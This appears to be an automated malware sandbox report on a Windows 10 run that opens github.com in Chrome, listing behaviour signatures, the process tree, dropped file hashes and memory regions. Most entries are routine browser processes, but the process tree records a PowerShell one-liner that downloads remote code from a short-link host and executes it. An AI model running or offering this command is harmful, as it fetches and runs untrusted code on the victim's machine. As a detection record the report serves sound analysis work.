Resubmissions

09-09-2024 19:47

240909-yhlkaawgqp 3

16-08-2024 15:24

240816-stchvswbkk 3

19-07-2024 09:10

240719-k46wfswhja 1

19-07-2024 09:10

240719-k41z7stalq 1

09-07-2024 04:19

240709-exzwnswbnr 8

08-07-2024 07:13

240708-h2an5azgkg 6

07-07-2024 10:00

240707-l1l8ba1gqb 10

07-07-2024 09:59

240707-l1e41a1gpc 1

06-07-2024 07:41

240706-jjdhqstcpg 4

06-07-2024 06:14

240706-gzq3na1blh 1

Analysis

  • max time kernel
    157s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-07-2024 04:19

General

  • Target

    https://github.com

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4912
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93365ab58,0x7ff93365ab68,0x7ff93365ab78
      2⤵
        PID:372
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:2
        2⤵
          PID:1456
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:8
          2⤵
            PID:1288
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:8
            2⤵
              PID:912
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:1
              2⤵
                PID:2612
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:1
                2⤵
                  PID:740
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4260 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:8
                  2⤵
                    PID:4400
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4112 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:8
                    2⤵
                      PID:4944
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:8
                      2⤵
                        PID:4996
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=924 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:2
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3116
                    • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                      "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                      1⤵
                        PID:2096
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe"
                        1⤵
                          PID:4840
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -c irm "https://707.su/K4J | iex"
                            2⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2676

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                          Filesize

                          1KB

                          MD5

                          92e362a3a8ac1a36d511bc5174d42396

                          SHA1

                          a917770d917d64da69c45b92256c8ab341fd49e1

                          SHA256

                          7adc56b5dbcee04d9b0c8ff15904f41393be7126d66f9c6cafeb48135bc1ae93

                          SHA512

                          79b5ef3f666d81db4537be3a32d48de0191799aa1a99e0ca85dfa0198b0f8f74a4e4494e51e60893cdb0cae75ea771c526de96abecbbf0bd9e0f9f32cedc34b0

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                          Filesize

                          1KB

                          MD5

                          aea659379e4f9358c280408dfbf2de5a

                          SHA1

                          45a15f0b03f650b053ad2e60e9058911a03536b3

                          SHA256

                          168d6bf6092685e122288a1b03dba79ff2be76a016e5c12c976c31077b737bce

                          SHA512

                          2220133fe53af0709b8578a4eb0ce55359883c2999201ffb29baa14a92a1301eeb5c5de96b911075b22ae9a1a41a4dac51f1a9c448d51a000e2b51730fb093c9

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                          Filesize

                          1KB

                          MD5

                          0a4b52dab5a5f4e9bf1d8385871fa0cf

                          SHA1

                          926fa577793dab19f132e737a7ef696e7c178571

                          SHA256

                          18822a41d5c9972e99dbb489c53d26d50ed9c9925a1f026397207a756ca9795e

                          SHA512

                          583afe21f8d1e44f2a151beffef5a5e90754e4330a1f351bdf91d9862539c740ab623332272e70bf2ca4ac02aee9eb64b36b21f6899601b012fef629c150da4d

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                          Filesize

                          2B

                          MD5

                          d751713988987e9331980363e24189ce

                          SHA1

                          97d170e1550eee4afc0af065b78cda302a97674c

                          SHA256

                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                          SHA512

                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                          Filesize

                          1KB

                          MD5

                          462bd1a7580e431f3551d4c9bb0fdf6b

                          SHA1

                          4cbcaf03e9cb4cf805423811c3f2b4ce43185e83

                          SHA256

                          2ce026e45c14cb9ad67ab17e0f8257ddc3696df97901f7e6ff8626b9088d0803

                          SHA512

                          19dfaef9b8f0c3a830a43ebd0929635ac80b38363b600df518d6f8e1cca8a8262d385b721e39d87c935d7cf17c88e9d170475cd87c751111be9e2e41c913b6c1

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                          Filesize

                          7KB

                          MD5

                          0091215ba7365507ca6607459f649bb1

                          SHA1

                          29cc653ad4850f4c13aa810e34fe7b418d406fb2

                          SHA256

                          1efcadcbd8d781bfcd704885bbc903a4e401687146a9208e146ea6a0ef4dded1

                          SHA512

                          ff3b0ef4398d4feb06c43566fb0384acc8201b7a7a386ee54a96a58f9aec3f79aab307571eb8fd80cdf8bbf8445b256532c5d9340751872214698f21dd1bc26f

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                          Filesize

                          144KB

                          MD5

                          59a5c901b9c5b6e91e499ac53a312253

                          SHA1

                          240dd61a165f4a6dc1f6ee4de802e7014c34d376

                          SHA256

                          fbef9df9a817ee181805be201ddb7fd054a8ac796e8a254b5d65e6a2b7f6385a

                          SHA512

                          6b04a86b8d92baf49c7918ee9064a03d244850ede6dfc894e0f1521aa49fe3d168580b55f62a6401d7a5c8de25691b2672e148f836ee0fa1e2706c2bc19e2a9b

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5josnrmd.aw1.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • memory/2676-191-0x00007FF920183000-0x00007FF920185000-memory.dmp

                          Filesize

                          8KB

                        • memory/2676-197-0x0000022CC7C50000-0x0000022CC7C72000-memory.dmp

                          Filesize

                          136KB

                        • memory/2676-202-0x00007FF920180000-0x00007FF920C41000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2676-203-0x00007FF920180000-0x00007FF920C41000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2676-222-0x00007FF920180000-0x00007FF920C41000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2676-225-0x00007FF920180000-0x00007FF920C41000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2676-226-0x00007FF920180000-0x00007FF920C41000-memory.dmp

                          Filesize

                          10.8MB